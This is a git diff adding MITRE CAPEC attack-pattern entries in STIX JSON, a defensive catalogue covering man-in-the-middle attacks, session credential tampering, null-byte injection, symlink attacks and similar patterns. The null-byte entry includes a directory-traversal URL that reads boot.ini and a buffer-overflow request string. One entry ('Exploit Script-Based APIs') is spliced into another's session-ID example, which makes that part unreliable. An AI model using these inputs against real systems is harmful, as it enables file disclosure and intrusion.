b/capec/attack-pattern/attack-pattern--9f791235-8dca-43f4-aeda-1c58a81f76ae.json new file mode 100644 index 0000000000..cde9b07403 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--9f791235-8dca-43f4-aeda-1c58a81f76ae.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--ead25128-d9d9-47fe-8124-ea7f5ec71463", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--9f791235-8dca-43f4-aeda-1c58a81f76ae", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Leveraging Active Man in the Middle Attacks to Bypass Same Origin Policy", + "description": "An attacker leverages a man in the middle attack in order to bypass the same origin policy protection in the victim's browser. This active man in the middle attack could be launched, for instance, when the victim is connected to a public WIFI hot spot. An attacker is able to intercept requests and responses between the victim's browser and some non-sensitive website that does not use TLS. For instance, the victim may be checking flight or weather information. When an attacker intercepts a response bound to the victim, an attacker adds an iFrame (which is possibly invisible) to the response referencing some domain with sensitive functionality and forwards the response to the victim. The victim's browser than automatically initiates an unauthorized request to the site with sensitive functionality. The same origin policy would prevent making these requests to a site other than the one from which the Java Script came, but the attacker once again uses active man in the middle to intercept these automatic requests and redirect them to the domain / service with sensitive functionality. Any persistent cookies that the victim has in his or her browser would be used for these unauthorized requests. The attacker thus actively directs the victim to a site with sensitive functionality. When the site with sensitive functionality responds back to the victim's request, an active man in the middle attacker intercepts these responses, injects his or her own malicious Java Script into these responses, and forwards to the victim's browser. In the victim's browser, that Java Script executes under the restrictions of the site with sensitive functionality and can essentially be used to continue to interact with the sensitive site. So an attacker can execute scripts within the victim's browser on any domains the attacker desires. The attacker is able to use this technique to steal cookies from the victim's browser for whatever site the attacker wants. This applies to both persistent cookies and HTTP only cookies (unlike traditional XSS attacks). An attacker is also able to use this technique to steal authentication credentials for sites that only encrypt the login form, but do not require a secure channel for the initial request to get to the page with the login form. Further the attacker is also able to steal any autocompletion information. This attack pattern can also be used to enable session fixation and cache poisoning attacks. Additional attacks can be enabled as well.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/466.html", + "external_id": "CAPEC-466" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/300.html", + "external_id": "CWE-300" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Roi Saltzman, Adi Sharabani, Active Man in the Middle Attacks, 2009--02---02, IBM Rational Application Security Group", + "url": "http://blog.watchfire.com/wfblog/2009/02/active-man-in-the-middle-attacks.html", + "external_id": "REF-403" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_prerequisites": [ + "The victim and the attacker are both in an environment where an active man in the middle attack is possible (e.g., public WIFI hot spot)The victim visits at least one website that does not use TLS / SSL" + ], + "x_capec_skills_required": { + "Low": "Ability to intercept and modify requests / responses", + "Medium": "Solid understanding of the HTTP protocol" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--9fd50026-2e98-4d6e-9805-e1ed3f71f7f8.json b/capec/attack-pattern/attack-pattern--9fd50026-2e98-4d6e-9805-e1ed3f71f7f8.json new file mode 100644 index 0000000000..93c13d592d --- /dev/null +++ b/capec/attack-pattern/attack-pattern--9fd50026-2e98-4d6e-9805-e1ed3f71f7f8.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--35a70719-15a5-4bff-a941-9d191f3981fd", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--9fd50026-2e98-4d6e-9805-e1ed3f71f7f8", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Session Credential Falsification through Manipulation", + "description": "An attacker manipulates an existing credential in order to gain access to a target application. Session credentials allow users to identify themselves to a service after an initial authentication without needing to resend the authentication information (usually a username and password) with every message. An attacker may be able to manipulate a credential sniffed from an existing connection in order to gain access to a target server. For example, a credential in the form of a web cookie might have a field that indicates the access rights of a user. By manually tweaking this cookie, a user might be able to increase their access rights to the server. Alternately an attacker may be able to manipulate an existing credential to appear as a different user. This attack differs from falsification through prediction in that the user bases their modified credentials off existing credentials instead of using patterns detected in prior credentials to create a new credential that is accepted because it fits the pattern. As a result, an attacker may be able to impersonate other users or elevate their permissions to a targeted service.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/226.html", + "external_id": "CAPEC-226" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/565.html", + "external_id": "CWE-565" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/472.html", + "external_id": "CWE-472" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_prerequisites": [ + "The targeted application must use session credentials to identify legitimate users." + ], + "x_capec_resources_required": [ + "An attacker will need tools to sniff existing credentials (possibly their own) in order to retrieve a base credential for modification. They will need to understand how the components of the credential affect server behavior and how to manipulate this behavior by changing the credential. Finally, they will need tools to allow them to craft and transmit a modified credential." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--9fe55f74-de34-4b76-b645-a747f47c67b5.json b/capec/attack-pattern/attack-pattern--9fe55f74-de34-4b76-b645-a747f47c67b5.json new file mode 100644 index 0000000000..d0c4081e32 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--9fe55f74-de34-4b76-b645-a747f47c67b5.json @@ -0,0 +1,78 @@ +{ + "type": "bundle", + "id": "bundle--8dc1ab1c-6aca-4254-a08b-baf2270a8fa5", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--9fe55f74-de34-4b76-b645-a747f47c67b5", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP RPC Scan", + "description": "An adversary scans for RPC services listing on a Unix/Linux host. This type of scan can be obtained via native operating system utilities or via port scanners like nmap. When performed by a scanner, an RPC datagram is sent to a list of UDP ports and the response is recorded. Particular types of responses can be indicative of well-known RPC services running on a UDP port. Direct RPC scans that bypass portmapper/sunrpc are typically slow compare to other scan types, are easily detected by IPS/IDS systems, and can only detect open ports when an RPC service responds. ICMP diagnostic message responses can help identify closed ports, however filtered and unfiltered ports cannot be identified through TCP RPC scans. There are two general approaches to RPC scanning: One is to use a native operating system utility, or script, to query the portmapper/rpcbind application running on port 111. Portmapper will return a list of registered RPC services. Alternately, one can use a port scanner or script to scan for RPC services directly. Discovering RPC services gives the attacker potential targets to attack, as some RPC services are insecure by default.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/307.html", + "external_id": "CAPEC-307" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html", + "external_id": "CWE-200" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33" + }, + { + "source_name": "reference_from_CAPEC", + "description": "J. Postel, RFC768 - User Datagram Protocol, 1980--08---28", + "url": "http://www.faqs.org/rfcs/rfc768.html", + "external_id": "REF-158" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC, ISBN: 978-0-9799587-1-7", + "external_id": "REF-34" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Gordon \"Fyodor\" Lyon, The Art of Port Scanning (Volume: 7, Issue. 51), Phrack Magazine, 1997", + "url": "http://phrack.org/issues/51/11.html", + "external_id": "REF-130" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Other", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_prerequisites": [ + "RPC scanning requires no special privileges when it is performed via a native system utility." + ], + "x_capec_resources_required": [ + "The ability to craft custom RPC datagrams for use during network reconnaissance via native OS utilities or a port scanning tool. By tailoring the bytes injected one can scan for specific RPC-registered services. Depending upon the method used it may be necessary to sniff the network in order to see the response." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--a0553da3-9941-4500-b267-cb7e16a5bc63.json b/capec/attack-pattern/attack-pattern--a0553da3-9941-4500-b267-cb7e16a5bc63.json new file mode 100644 index 0000000000..22eac76d09 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--a0553da3-9941-4500-b267-cb7e16a5bc63.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--f05efbe4-d6b8-4c95-965f-1dbc3f1fde9a", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--a0553da3-9941-4500-b267-cb7e16a5bc63", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Collect Data from Clipboard", + "description": "The adversary exploits an application that allows for the copying of sensitive data or information by collecting information copied to the clipboard. Data copied to the clipboard can be accessed by other applications, such as malware built to exfiltrate or log clipboard contents on a periodic basis. In this way, the adversary aims to garner information to which he is unauthorized.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/637.html", + "external_id": "CAPEC-637" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/267.html", + "external_id": "CWE-267" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have a means (i.e., a pre-installed tool or background process) by which to collect data from the clipboard and store it. That is, when the target copies data to the clipboard (e.g., to paste into another application), the adversary needs some means of capturing that data in a third location." + ], + "x_capec_skills_required": { + "High": "To deploy a hidden process or malware on the system to automatically collect clipboard data." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--a206f37f-7272-4125-af6c-575e01231af5.json b/capec/attack-pattern/attack-pattern--a206f37f-7272-4125-af6c-575e01231af5.json new file mode 100644 index 0000000000..eb047a21e1 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--a206f37f-7272-4125-af6c-575e01231af5.json @@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--7e360d63-5e12-49b9-9658-bd2dcf2e7442", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--a206f37f-7272-4125-af6c-575e01231af5", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-01-03T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Traffic Injection", + "description": "An adversary injects traffic into the target's network connection. The adversary is therefore able to degrade or disrupt the connection, and potentially modify the content. This is not a flooding attack, as the adversary is not focusing on exhausting resources. Instead, the adversary is crafting a specific input to affect the system in a particular way.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/594.html", + "external_id": "CAPEC-594" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/940.html", + "external_id": "CWE-940" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution (The injection of specific content into a connection can trigger a disruption in that communications channel, thereby denying availability of the service.)" + ], + "Integrity": [ + "Other (An adversary's injection of additional content into a communication channel negatively impacts the integrity of that channel.)" + ] + }, + "x_capec_prerequisites": [ + "The target application must leverage an open communications channel.", + "The channel on which the target communicates must be vulnerable to interception (e.g., man in the middle attack)." + ], + "x_capec_resources_required": [ + "A tool, such as a MITM Proxy, that is capable of generating and injecting custom inputs to be used in the attack." + ], + "x_capec_status": "Stable", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--a211b4f0-2565-40ad-a94c-4577ab030e77.json b/capec/attack-pattern/attack-pattern--a211b4f0-2565-40ad-a94c-4577ab030e77.json new file mode 100644 index 0000000000..119d2d02d4 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--a211b4f0-2565-40ad-a94c-4577ab030e77.json @@ -0,0 +1,120 @@ +{ + "type": "bundle", + "id": "bundle--d687d441-b96a-4ada-a292-49630120ccd0", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--a211b4f0-2565-40ad-a94c-4577ab030e77", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Embedding NULL Bytes", + "description": "An attacker embeds one or more null bytes in input to the target software. This attack relies on the usage of a null-valued byte as a string terminator in many environments. The goal is for certain components of the target software to stop processing the input when it encounters the null byte(s).", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/52.html", + "external_id": "CAPEC-52" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/158.html", + "external_id": "CWE-158" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/172.html", + "external_id": "CWE-172" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html", + "external_id": "CWE-173" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/171.html", + "external_id": "CWE-171" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html", + "external_id": "CWE-74" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html", + "external_id": "CWE-20" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html", + "external_id": "CWE-697" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html", + "external_id": "CWE-707" + }, + { + "source_name": "reference_from_CAPEC", + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Adobe Acrobat/Acrobat Reader ActiveX Control Buffer Overflow Vulnerability, iDefense Labs Public Advisory, 2004--08---13, Verisign, Inc.", + "url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=126", + "external_id": "REF-445" + }, + { + "source_name": "reference_from_CAPEC", + "description": "PHP Input Validation Vulnerabilities, Bugtraq mailing list archive", + "url": "http://msgs.securepoint.com/bugtraq/", + "external_id": "REF-446" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_example_instances": [ + "\n Directory Browsing\n Assume a Web application allows a user to access a set of reports. The path to the reports directory may be something like web/username/reports. If the username is supplied via a hidden field, an attacker could insert a bogus username such as ../../../../../WINDOWS. If the attacker needs to remove the trailing string /reports, then he can simply insert enough characters so the string is truncated. Alternatively the attacker might apply the postfix NULL character (%00) to determine whether this terminates the string.\n Different forms of NULL to think about include\n PATH%00PATH[0x00]PATH[alternate representation of NULL character]%00\n ", + "\n Exploitation of a buffer overflow vulnerability in the ActiveX component packaged with Adobe Systems Inc.'s Acrobat/Acrobat Reader allows remote attackers to execute arbitrary code.\n The problem specifically exists upon retrieving a link of the following form:\n GET /any_existing_dir/any_existing_pdf.pdf%00[long string] HTTP/1.1\n Where [long string] is a malicious crafted long string containing acceptable URI characters. The request must be made to a web server that truncates the request at the null byte (%00), otherwise an invalid file name is specified and a \"file not found\" page will be returned. Example web servers that truncate the requested URI include Microsoft IIS and Netscape Enterprise. Though the requested URI is truncated for the purposes of locating the file the long string is still passed to the Adobe ActiveX component responsible for rendering the page. This in turn triggers a buffer overflow within RTLHeapFree() allowing for an attacker to overwrite an arbitrary word in memory. The responsible instructions from RTLHeapFree() are shown here:\n 0x77F83AE5 MOV EAX,[EDI+8]0x77F83AE8 MOV ECX,[EDI+C]...0x77F83AED MOV [ECX],EAX\n The register EDI contains a pointer to a user-supplied string. The attacker therefore has control over both the ECX and EAX registers used in the shown MOV instruction.\n Successful exploitation allows remote attackers to utilize the arbitrary word overwrite to redirect the flow of control and eventually take control of the affected system. Code execution will occur under the context of the user that instantiated the vulnerable version of Adobe Acrobat.\n An attacker does not need to establish a malicious web site as exploitation can occur by adding malicious content to the end of any embedded link and referencing any Microsoft IIS or Netscape Enterprise web server. Clicking on a direct malicious link is also not required as it may be embedded within an IMAGE tag, an IFRAME or an auto-loading script.\n Successful exploitation requires that a payload be written such that certain areas of the input are URI acceptable. This includes initial injected instructions as well as certain overwritten addresses. This increases the complexity of successful exploitation. While not trivial, exploitation is definitely plausible [R.52.2].See also: CVE-2004-0629", + "\n Consider the following PHP script:\n $whatever = addslashes($_REQUEST['whatever']);include(\"/path/to/program/\" . $whatever . \"/header.htm\");\n A malicious attacker might open the following URL, disclosing the boot.ini file:\n http://localhost/phpscript.php?whatever=../../../../boot.ini%00\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The program does not properly handle postfix NULL terminators" + ], + "x_capec_skills_required": { + "High": "Execution of arbitrary code", + "Medium": "Directory traversal" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--a284d350-0b7b-4a05-a752-2c4135aec8c3.json b/capec/attack-pattern/attack-pattern--a284d350-0b7b-4a05-a752-2c4135aec8c3.json new file mode 100644 index 0000000000..3b6ca67434 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--a284d350-0b7b-4a05-a752-2c4135aec8c3.json @@ -0,0 +1,42 @@ +{ + "type": "bundle", + "id": "bundle--5c46e290-ceec-4a39-82f2-8362596bc9d8", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--a284d350-0b7b-4a05-a752-2c4135aec8c3", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Exploit Script-Based APIs", + "description": "Some APIs support scripting instructions as arguments. Methods that take scripted instructions (or references to scripted instructions) can be very flexible and powerful. However, if an attacker can specify the script that serves as input to these methods they can gain access to a great deal of functionality. For example, HTML pages support \n A similar example uses session ID as an argument of the URL.\n http://www.example.com/index.php/sessionid=0123456789\n Once the victim clicks the links, the attacker may be able to bypass authentication or piggy-back off some other authenticated victim's session.\n " + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The targeted application must use session credentials to identify legitimate users. Session identifiers that remains unchanged when the privilege levels change. Predictable session identifiers." + ], + "x_capec_resources_required": [ + "Attackers may require tools to craft messages containing their forged credentials, and ability to send HTTP request to a web application." + ], + "x_capec_skills_required": { + "Medium": "Forge the session credential and reply the request." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--a3161555-44ae-4e28-aac7-537b171ffa52.json b/capec/attack-pattern/attack-pattern--a3161555-44ae-4e28-aac7-537b171ffa52.json new file mode 100644 index 0000000000..b49c2a0329 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--a3161555-44ae-4e28-aac7-537b171ffa52.json @@ -0,0 +1,29 @@ +{ + "type": "bundle", + "id": "bundle--bcd79821-a331-4e76-83cd-def6fd55da81", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--a3161555-44ae-4e28-aac7-537b171ffa52", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: OS Fingerprinting", + "description": "This pattern has been deprecated as it was determined to be an unnecessary layer of abstraction. Please refer to the standard level patterns CAPEC-312 : Active OS Fingerprinting or CAPEC-313 : Passive OS Fingerprinting going forward, or to any of the detailed patterns that are children of them.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/311.html", + "external_id": "CAPEC-311" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--a3d8031b-f32f-4ab6-b778-3c06dc20dfb2.json b/capec/attack-pattern/attack-pattern--a3d8031b-f32f-4ab6-b778-3c06dc20dfb2.json new file mode 100644 index 0000000000..6f648c6e04 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--a3d8031b-f32f-4ab6-b778-3c06dc20dfb2.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--91fdea49-fff3-4e05-817e-49b092ecb243", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--a3d8031b-f32f-4ab6-b778-3c06dc20dfb2", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-11-09T00:00:00.000Z", + "name": "Probe iOS Screenshots", + "description": "An adversary examines screenshot images created by iOS in an attempt to obtain sensitive information. These images are used by iOS to aid in the visual transition between open applications and improve the user's experience with a device. An application can be at risk even if it properly protects sensitive information when at rest. If the application displays sensitive information on the screen, then the potential exists for iOS to unintentionally record that information in an image file. An adversary can retrieve these images either by gaining access to the image files, or by physically obtaining the device and leveraging the multitasking switcher interface.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/498.html", + "external_id": "CAPEC-498" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Jonathan Zdziarksi, Hacking and Securing iOS Applications (First Edition), 2012, O'Reilly Media, Inc.", + "external_id": "REF-426" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_prerequisites": [ + "This type of an attack requires physical access to a device to either excavate the image files (potentially by leveraging a Jailbreak) or view the screenshots through the multitasking switcher (by double tapping the home button on the device)." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--a434020c-1283-4b3d-b150-ce5823790442.json b/capec/attack-pattern/attack-pattern--a434020c-1283-4b3d-b150-ce5823790442.json new file mode 100644 index 0000000000..6f507f28b5 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--a434020c-1283-4b3d-b150-ce5823790442.json @@ -0,0 +1,35 @@ +{ + "type": "bundle", + "id": "bundle--95ffffb2-d8df-40dd-85b4-2cc9e23eeb52", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--a434020c-1283-4b3d-b150-ce5823790442", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "Target Influence via Instant Rapport", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/435.html", + "external_id": "CAPEC-435" + }, + { + "source_name": "reference_from_CAPEC", + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "url": "http://www.social-engineer.org", + "external_id": "REF-348" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--a486810c-f63e-4c74-8ff9-73051a1c1d28.json b/capec/attack-pattern/attack-pattern--a486810c-f63e-4c74-8ff9-73051a1c1d28.json new file mode 100644 index 0000000000..bdc00c49ea --- /dev/null +++ b/capec/attack-pattern/attack-pattern--a486810c-f63e-4c74-8ff9-73051a1c1d28.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--93b7040f-b86d-4dbf-a5c9-d771c38fce79", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--a486810c-f63e-4c74-8ff9-73051a1c1d28", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "TCP Fragmentation", + "description": "An attacker may execute a TCP Fragmentation attack against a target with the intention of avoiding filtering rules. IP fragmentation occurs when an IP datagram is larger than the MTU of the route the datagram has to traverse. The attacker attempts to fragment the TCP packet such that the headers flag field is pushed into the second fragment which typically is not filtered. This behavior defeats some IPS and firewall filters who typically check the FLAGS in the header of the first packet since dropping this packet prevents the following fragments from being processed and assembled. Another variation is overlapping fragments thus that an innocuous first segment passes the filter and the second segment overwrites the TCP header data with the true payload which is malicious in nature. The malicious payload manipulated properly may lead to a DoS due to resource consumption or kernel crash. Additionally the fragmentation could be used in conjunction with sending fragments at a rate slightly slower than the timeout to cause a DoS condition by forcing resources that assemble the packet to wait an inordinate amount of time to complete the task. The fragmentation identification numbers could also be duplicated very easily as there are only 16 bits in IPv4 so only 65536 packets are needed.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/494.html", + "external_id": "CAPEC-494" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html", + "external_id": "CWE-770" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/404.html", + "external_id": "CWE-404" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Security Considerations - IP Fragment Filtering", + "url": "https://www.rfc-editor.org/rfc/rfc1858.txt", + "external_id": "REF-423" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_prerequisites": [ + "This type of an attack requires the target system to be running a vulnerable implementation of IP, and the attacker needs to ability to send TCP packets of arbitrary size with crafted data." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--a511fff6-fe2b-4888-974d-265002b6ddac.json b/capec/attack-pattern/attack-pattern--a511fff6-fe2b-4888-974d-265002b6ddac.json new file mode 100644 index 0000000000..3a98536851 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--a511fff6-fe2b-4888-974d-265002b6ddac.json @@ -0,0 +1,85 @@ +{ + "type": "bundle", + "id": "bundle--ccebf476-7368-4eab-af45-fb2a178a4899", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--a511fff6-fe2b-4888-974d-265002b6ddac", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Symlink Attack", + "description": "An attacker positions a symbolic link in such a manner that the targeted user or application accesses the link's endpoint, assuming that it is accessing a file with the link's name. The endpoint file may be either output or input. If the file is output, the result is that the endpoint is modified, instead of a file at the intended location. Modifications to the endpoint file may include appending, overwriting, corrupting, changing permissions, or other modifications. In some variants of this attack the attacker may be able to control the change to a file while in other cases they cannot. The former is especially damaging since the attacker may be able to grant themselves increased privileges or insert false information, but the latter can also be damaging as it can expose sensitive information or corrupt or destroy vital system or application files. Alternatively, the endpoint file may serve as input to the targeted application. This can be used to feed malformed input into the target or to cause the target to process different information, possibly allowing the attacker to control the actions of the target or to cause the target to expose information to the attacker. Moreover, the actions taken on the endpoint file are undertaken with the permissions of the targeted user or application, which may exceed the permissions that the attacker would normally have.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/132.html", + "external_id": "CAPEC-132" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/59.html", + "external_id": "CWE-59" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Shaun Colley, Crafting Symlinks for Fun and Profit", + "url": "http://www.infosecwriters.com/texts.php?op=display&id=159", + "external_id": 